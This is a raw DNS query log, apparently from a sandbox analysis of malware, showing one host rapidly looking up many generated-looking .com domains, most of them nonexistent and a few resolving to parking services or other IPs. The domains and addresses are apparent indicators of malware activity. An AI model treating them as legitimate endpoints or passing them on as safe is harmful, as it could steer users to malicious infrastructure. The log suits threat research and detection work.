Aug 23, 2024 18:47:02.438819885 CEST	1.1.1.1	192.168.2.4	0x2d7c	No error (0)	sedoparking.com		64.190.63.136	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:02.575162888 CEST	1.1.1.1	192.168.2.4	0x1fee	No error (0)	gadyniw.com		154.212.231.82	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:02.576766014 CEST	1.1.1.1	192.168.2.4	0x1fee	No error (0)	gadyniw.com		154.212.231.82	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:03.166543007 CEST	1.1.1.1	192.168.2.4	0x1ca7	No error (0)	gadyniw.com		154.212.231.82	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.233211994 CEST	1.1.1.1	192.168.2.4	0xead2	Name error (3)	qebylug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.233339071 CEST	1.1.1.1	192.168.2.4	0xa326	No error (0)	pupydeq.com		13.248.169.48	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.233339071 CEST	1.1.1.1	192.168.2.4	0xa326	No error (0)	pupydeq.com		76.223.54.146	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.233350039 CEST	1.1.1.1	192.168.2.4	0x8158	Name error (3)	lyvylyn.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.233649015 CEST	1.1.1.1	192.168.2.4	0xd1d1	Name error (3)	vojymic.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.237473011 CEST	1.1.1.1	192.168.2.4	0x9ac0	Name error (3)	gahynus.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.238244057 CEST	1.1.1.1	192.168.2.4	0x473b	Name error (3)	lygynud.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.238398075 CEST	1.1.1.1	192.168.2.4	0x1df4	Name error (3)	qetysal.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.239429951 CEST	1.1.1.1	192.168.2.4	0xe69b	Name error (3)	qegynuv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.239442110 CEST	1.1.1.1	192.168.2.4	0xfe6e	Name error (3)	qexykaq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.243830919 CEST	1.1.1.1	192.168.2.4	0xfcab	Name error (3)	pufybyv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.243848085 CEST	1.1.1.1	192.168.2.4	0xbd67	Name error (3)	vowypit.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.243856907 CEST	1.1.1.1	192.168.2.4	0xc028	Name error (3)	purypol.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.243868113 CEST	1.1.1.1	192.168.2.4	0xf257	Name error (3)	vocykem.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.243877888 CEST	1.1.1.1	192.168.2.4	0x7205	Name error (3)	gacykeh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.243882895 CEST	1.1.1.1	192.168.2.4	0x7f6b	Name error (3)	qeqytup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.243892908 CEST	1.1.1.1	192.168.2.4	0x6a59	Name error (3)	lyxyjaj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.271593094 CEST	1.1.1.1	192.168.2.4	0xeeb1	Name error (3)	puzyjoq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.271610975 CEST	1.1.1.1	192.168.2.4	0xcdb2	Name error (3)	gadyveb.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.271735907 CEST	1.1.1.1	192.168.2.4	0x6637	Name error (3)	lymytux.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.271749020 CEST	1.1.1.1	192.168.2.4	0x9a0a	Name error (3)	ganyzub.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.272007942 CEST	1.1.1.1	192.168.2.4	0x9e7d	Name error (3)	lykymox.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.272022009 CEST	1.1.1.1	192.168.2.4	0x7b3b	Name error (3)	pujymip.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.272032976 CEST	1.1.1.1	192.168.2.4	0xb36a	Name error (3)	gatydaw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.272043943 CEST	1.1.1.1	192.168.2.4	0x67a1	Name error (3)	vopydek.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.272054911 CEST	1.1.1.1	192.168.2.4	0xd2db	Name error (3)	puvylyg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.272066116 CEST	1.1.1.1	192.168.2.4	0x4d22	Name error (3)	gaqypiz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.272077084 CEST	1.1.1.1	192.168.2.4	0x5378	Name error (3)	vofybyf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.281526089 CEST	1.1.1.1	192.168.2.4	0x682a	Name error (3)	qedyveg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.283662081 CEST	1.1.1.1	192.168.2.4	0x97f0	Name error (3)	volyjok.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.283674002 CEST	1.1.1.1	192.168.2.4	0xcd54	Name error (3)	galyhiw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.288717031 CEST	1.1.1.1	192.168.2.4	0x20e7	No error (0)	lysyvan.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.288717031 CEST	1.1.1.1	192.168.2.4	0x20e7	No error (0)	lysyvan.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.308598995 CEST	1.1.1.1	192.168.2.4	0x1ab4	Name error (3)	vonyryc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.308773994 CEST	1.1.1.1	192.168.2.4	0x6b34	Name error (3)	qekyhil.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.308784008 CEST	1.1.1.1	192.168.2.4	0x4b4f	Name error (3)	vojygut.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.309536934 CEST	1.1.1.1	192.168.2.4	0x6ae3	Name error (3)	lykygur.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.309545994 CEST	1.1.1.1	192.168.2.4	0x113b	Name error (3)	gatycoh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.316169977 CEST	1.1.1.1	192.168.2.4	0xe666	Name error (3)	puvywav.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.316181898 CEST	1.1.1.1	192.168.2.4	0x88eb	Name error (3)	vopycom.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.316190958 CEST	1.1.1.1	192.168.2.4	0xccca	Name error (3)	qegyfyp.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.316200972 CEST	1.1.1.1	192.168.2.4	0x2389	Name error (3)	qetyxiq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.316210985 CEST	1.1.1.1	192.168.2.4	0x6e53	Name error (3)	lygyfex.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.316220999 CEST	1.1.1.1	192.168.2.4	0x5068	Name error (3)	lyryxij.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.316226006 CEST	1.1.1.1	192.168.2.4	0x19aa	Name error (3)	gahyfyz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.316236973 CEST	1.1.1.1	192.168.2.4	0x1f62	Name error (3)	vocyqaf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.338990927 CEST	1.1.1.1	192.168.2.4	0x2fec	Name error (3)	pujygul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.342936993 CEST	1.1.1.1	192.168.2.4	0x12bd	Name error (3)	ganyrys.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.343110085 CEST	1.1.1.1	192.168.2.4	0xb435	Name error (3)	qexyqog.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.343120098 CEST	1.1.1.1	192.168.2.4	0x746a	Name error (3)	pufydep.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.345854998 CEST	1.1.1.1	192.168.2.4	0xe86d	Name error (3)	qebyrev.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.345865011 CEST	1.1.1.1	192.168.2.4	0x7e10	Name error (3)	vowyzuk.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.345870018 CEST	1.1.1.1	192.168.2.4	0x52b0	Name error (3)	lyvywed.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.345880032 CEST	1.1.1.1	192.168.2.4	0xe4d9	Name error (3)	gaqyzuw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.345896006 CEST	1.1.1.1	192.168.2.4	0x81ef	Name error (3)	vofydac.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.345906019 CEST	1.1.1.1	192.168.2.4	0x40ec	Name error (3)	gacyqob.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.345910072 CEST	1.1.1.1	192.168.2.4	0xab81	Name error (3)	pumytup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.345921040 CEST	1.1.1.1	192.168.2.4	0x782b	Name error (3)	puzymig.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.345931053 CEST	1.1.1.1	192.168.2.4	0xece0	Name error (3)	puryxuq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.345942020 CEST	1.1.1.1	192.168.2.4	0xcaaa	Name error (3)	lymylyr.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.345954895 CEST	1.1.1.1	192.168.2.4	0xe361	Name error (3)	volymum.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.355876923 CEST	1.1.1.1	192.168.2.4	0x26ac	Name error (3)	lyxymin.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.358086109 CEST	1.1.1.1	192.168.2.4	0x4beb	No error (0)	pupydeq.com		13.248.169.48	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.358086109 CEST	1.1.1.1	192.168.2.4	0x4beb	No error (0)	pupydeq.com		76.223.54.146	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.359208107 CEST	1.1.1.1	192.168.2.4	0x17b9	Name error (3)	qeqylyl.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.363888025 CEST	1.1.1.1	192.168.2.4	0x3858	Name error (3)	gadydas.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.382112980 CEST	1.1.1.1	192.168.2.4	0xa1f9	No error (0)	lysyvan.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.382112980 CEST	1.1.1.1	192.168.2.4	0xa1f9	No error (0)	lysyvan.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.498873949 CEST	1.1.1.1	192.168.2.4	0x5d94	No error (0)	pupycag.com		18.208.156.248	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:15.782815933 CEST	1.1.1.1	192.168.2.4	0x19a8	No error (0)	lyrysor.com	zz1985.qu200.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 23, 2024 18:47:15.782815933 CEST	1.1.1.1	192.168.2.4	0x19a8	No error (0)	zz1985.qu200.com	gtm-sg-6l13ukk0m05.qu200.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 23, 2024 18:47:15.782815933 CEST	1.1.1.1	192.168.2.4	0x19a8	No error (0)	gtm-sg-6l13ukk0m05.qu200.com		103.150.11.230	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:16.496458054 CEST	1.1.1.1	192.168.2.4	0xefc2	No error (0)	lyrysor.com	zz1985.qu200.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 23, 2024 18:47:16.496458054 CEST	1.1.1.1	192.168.2.4	0xefc2	No error (0)	zz1985.qu200.com	gtm-sg-6l13ukk0m05.qu200.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 23, 2024 18:47:16.496458054 CEST	1.1.1.1	192.168.2.4	0xefc2	No error (0)	gtm-sg-6l13ukk0m05.qu200.com		103.150.11.230	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:36.854923010 CEST	1.1.1.1	192.168.2.4	0x27cb	Name error (3)	qedysov.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:36.885438919 CEST	1.1.1.1	192.168.2.4	0xbd4	Name error (3)	pumylel.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:36.893754005 CEST	1.1.1.1	192.168.2.4	0xece0	No error (0)	galynuh.com		64.225.91.73	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.038492918 CEST	1.1.1.1	192.168.2.4	0x81b2	Name error (3)	lysysod.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.042779922 CEST	1.1.1.1	192.168.2.4	0x5461	Name error (3)	qekynuq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.053014994 CEST	1.1.1.1	192.168.2.4	0x14c1	Name error (3)	pupypiv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.057693005 CEST	1.1.1.1	192.168.2.4	0x882c	Name error (3)	ganykaz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.058971882 CEST	1.1.1.1	192.168.2.4	0x74d2	Name error (3)	vonyket.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.067194939 CEST	1.1.1.1	192.168.2.4	0x9af1	Name error (3)	qebykap.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.073044062 CEST	1.1.1.1	192.168.2.4	0xb965	Name error (3)	pujybyq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.079309940 CEST	1.1.1.1	192.168.2.4	0x734f	Name error (3)	lykynyj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.084222078 CEST	1.1.1.1	192.168.2.4	0xa936	Name error (3)	vopypif.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.084235907 CEST	1.1.1.1	192.168.2.4	0xc6de	Name error (3)	lyvyjox.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.086267948 CEST	1.1.1.1	192.168.2.4	0x505	Name error (3)	qetytug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.111695051 CEST	1.1.1.1	192.168.2.4	0xe74c	Name error (3)	vojybek.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.112606049 CEST	1.1.1.1	192.168.2.4	0x4e0	Name error (3)	gatypub.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.112617970 CEST	1.1.1.1	192.168.2.4	0x5597	Name error (3)	puvyjop.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.131519079 CEST	1.1.1.1	192.168.2.4	0xb9d	Name error (3)	gahyvew.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.152654886 CEST	1.1.1.1	192.168.2.4	0xf65b	Name error (3)	purytyg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.156604052 CEST	1.1.1.1	192.168.2.4	0x4f2f	Name error (3)	lyrytun.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.156615973 CEST	1.1.1.1	192.168.2.4	0xe465	Name error (3)	vocyjic.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.170241117 CEST	1.1.1.1	192.168.2.4	0x562e	Name error (3)	gacyhis.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.173518896 CEST	1.1.1.1	192.168.2.4	0x3f05	Name error (3)	lygyvar.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.228699923 CEST	1.1.1.1	192.168.2.4	0x3536	Name error (3)	vowyrym.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.228809118 CEST	1.1.1.1	192.168.2.4	0x7434	Name error (3)	pufycol.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.228820086 CEST	1.1.1.1	192.168.2.4	0xcecb	Name error (3)	puzyguv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.230321884 CEST	1.1.1.1	192.168.2.4	0xc979	Name error (3)	vonyqok.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.230334997 CEST	1.1.1.1	192.168.2.4	0x7ee7	Name error (3)	galyfyb.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.230345011 CEST	1.1.1.1	192.168.2.4	0xbf16	Name error (3)	volygyf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.230355024 CEST	1.1.1.1	192.168.2.4	0xb593	Name error (3)	gaqyreh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.230372906 CEST	1.1.1.1	192.168.2.4	0xd061	Name error (3)	lysyxux.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.241229057 CEST	1.1.1.1	192.168.2.4	0x2ecb	Name error (3)	pumywaq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.252109051 CEST	1.1.1.1	192.168.2.4	0x8aa0	Name error (3)	qeqyreq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.252830029 CEST	1.1.1.1	192.168.2.4	0xacb1	Name error (3)	lymywaj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.252842903 CEST	1.1.1.1	192.168.2.4	0x8b5c	Name error (3)	qekyfeg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.254162073 CEST	1.1.1.1	192.168.2.4	0x2e0	Name error (3)	qedyxip.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.259603024 CEST	1.1.1.1	192.168.2.4	0xf1a4	Name error (3)	lykyfen.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.259614944 CEST	1.1.1.1	192.168.2.4	0x33	Name error (3)	vopyzuc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.259624958 CEST	1.1.1.1	192.168.2.4	0x5073	Name error (3)	pujydag.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.271140099 CEST	1.1.1.1	192.168.2.4	0xf77e	Name error (3)	qetylyv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.271632910 CEST	1.1.1.1	192.168.2.4	0xaf83	Name error (3)	gatyzys.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.271647930 CEST	1.1.1.1	192.168.2.4	0xdec0	Name error (3)	vocymut.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.273103952 CEST	1.1.1.1	192.168.2.4	0x6bac	Name error (3)	gahydoh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.291471958 CEST	1.1.1.1	192.168.2.4	0x1265	Name error (3)	qebyqil.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.291485071 CEST	1.1.1.1	192.168.2.4	0x5486	Name error (3)	pupyxup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.291493893 CEST	1.1.1.1	192.168.2.4	0x17fe	Name error (3)	vojydam.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.296873093 CEST	1.1.1.1	192.168.2.4	0x2268	Name error (3)	puvymul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.296885967 CEST	1.1.1.1	192.168.2.4	0x86c8	Name error (3)	lyryled.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.308409929 CEST	1.1.1.1	192.168.2.4	0xa27b	Name error (3)	vowykaf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.311341047 CEST	1.1.1.1	192.168.2.4	0x31cc	Name error (3)	pufypiq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.316302061 CEST	1.1.1.1	192.168.2.4	0x6b2a	Name error (3)	qexynyp.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.319241047 CEST	1.1.1.1	192.168.2.4	0xc419	Name error (3)	ganyqow.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.330874920 CEST	1.1.1.1	192.168.2.4	0x8064	Name error (3)	lygysij.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.330888033 CEST	1.1.1.1	192.168.2.4	0x543c	Name error (3)	gacynuz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.330895901 CEST	1.1.1.1	192.168.2.4	0x9343	Name error (3)	gaqykab.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.333854914 CEST	1.1.1.1	192.168.2.4	0x88b1	Name error (3)	lyvymir.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.336671114 CEST	1.1.1.1	192.168.2.4	0xe5b3	Name error (3)	purylev.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.373155117 CEST	1.1.1.1	192.168.2.4	0xea78	No error (0)	vofycot.com		103.224.182.252	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.377871037 CEST	1.1.1.1	192.168.2.4	0xb823	Name error (3)	lyxygud.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.409786940 CEST	1.1.1.1	192.168.2.4	0x86c	No error (0)	gadyciz.com		44.221.84.105	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.444397926 CEST	1.1.1.1	192.168.2.4	0xfad	Name error (3)	qegysoq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.455167055 CEST	1.1.1.1	192.168.2.4	0x7fb0	No error (0)	galynuh.com		64.225.91.73	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.456842899 CEST	1.1.1.1	192.168.2.4	0xfe1a	No error (0)	qegyval.com		154.85.183.50	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.566437006 CEST	1.1.1.1	192.168.2.4	0x9b02	No error (0)	gadyciz.com		44.221.84.105	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.612678051 CEST	1.1.1.1	192.168.2.4	0xb3b4	No error (0)	lyxynyx.com		103.224.212.210	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:37.719563961 CEST	1.1.1.1	192.168.2.4	0x4eee	No error (0)	vofycot.com		103.224.182.252	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:38.017304897 CEST	1.1.1.1	192.168.2.4	0xf40e	No error (0)	lyxynyx.com		103.224.212.210	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:38.087523937 CEST	1.1.1.1	192.168.2.4	0xbff3	No error (0)	qegyval.com		154.85.183.50	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:38.287389040 CEST	1.1.1.1	192.168.2.4	0x4358	No error (0)	qexyhuv.com		15.197.240.20	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:38.291616917 CEST	1.1.1.1	192.168.2.4	0x4358	No error (0)	qexyhuv.com		15.197.240.20	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:38.466334105 CEST	1.1.1.1	192.168.2.4	0xfef7	Server failure (2)	qexyhuv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:38.734062910 CEST	1.1.1.1	192.168.2.4	0x669c	No error (0)	ww16.vofycot.com	www.sedoparking.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 23, 2024 18:47:38.734062910 CEST	1.1.1.1	192.168.2.4	0x669c	No error (0)	www.sedoparking.com		64.190.63.136	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.237541914 CEST	1.1.1.1	192.168.2.4	0x38d1	No error (0)	ww25.lyxynyx.com	77026.bodis.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 23, 2024 18:47:39.237541914 CEST	1.1.1.1	192.168.2.4	0x38d1	No error (0)	77026.bodis.com		199.59.243.226	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.970561981 CEST	1.1.1.1	192.168.2.4	0x26cf	Name error (3)	vofypuk.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.972032070 CEST	1.1.1.1	192.168.2.4	0x28d5	Name error (3)	qeqykog.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.972044945 CEST	1.1.1.1	192.168.2.4	0x38dc	Name error (3)	puzybep.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.974685907 CEST	1.1.1.1	192.168.2.4	0xd6b	Name error (3)	lymyjon.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.974699020 CEST	1.1.1.1	192.168.2.4	0x2489	Name error (3)	galyvas.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.974709988 CEST	1.1.1.1	192.168.2.4	0x7821	Name error (3)	lysytyr.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.974720955 CEST	1.1.1.1	192.168.2.4	0x8503	Name error (3)	ganyhuh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.974730968 CEST	1.1.1.1	192.168.2.4	0xd16e	Name error (3)	pumyjig.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.974740982 CEST	1.1.1.1	192.168.2.4	0xbb2e	Name error (3)	qedytul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.976212978 CEST	1.1.1.1	192.168.2.4	0xe87a	Name error (3)	pupytyl.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.980855942 CEST	1.1.1.1	192.168.2.4	0x2f01	Name error (3)	gatyrez.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.980927944 CEST	1.1.1.1	192.168.2.4	0x13ae	Name error (3)	qegyxug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.980938911 CEST	1.1.1.1	192.168.2.4	0x1d1d	Name error (3)	vowyqoc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.981964111 CEST	1.1.1.1	192.168.2.4	0xf049	Name error (3)	qeqyqiv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.981975079 CEST	1.1.1.1	192.168.2.4	0x4bfe	Name error (3)	vocygyk.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.981985092 CEST	1.1.1.1	192.168.2.4	0x34ec	Name error (3)	galydoz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.981996059 CEST	1.1.1.1	192.168.2.4	0xceb7	Name error (3)	puzydal.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.982006073 CEST	1.1.1.1	192.168.2.4	0xcb3d	Name error (3)	lyxyfar.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.982014894 CEST	1.1.1.1	192.168.2.4	0x83f9	Name error (3)	gacyfew.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.982024908 CEST	1.1.1.1	192.168.2.4	0x24ce	Name error (3)	gadyzyh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.982034922 CEST	1.1.1.1	192.168.2.4	0x626b	Name error (3)	purywop.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.984158039 CEST	1.1.1.1	192.168.2.4	0xb6c6	Name error (3)	lyvyguj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.984169006 CEST	1.1.1.1	192.168.2.4	0x721f	Name error (3)	puvygyq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:39.984179020 CEST	1.1.1.1	192.168.2.4	0x1e5b	Name error (3)	qekysip.com	none	none	A (IP address)	IN (0x0001)	false
